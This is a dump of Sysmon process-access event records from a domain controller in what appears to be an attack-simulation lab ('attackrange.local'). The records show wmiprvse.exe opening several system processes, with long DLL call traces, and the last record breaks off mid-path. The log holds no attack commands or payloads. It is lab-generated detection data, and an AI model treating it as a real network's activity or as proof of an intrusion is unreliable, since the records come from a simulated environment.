10341000x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\w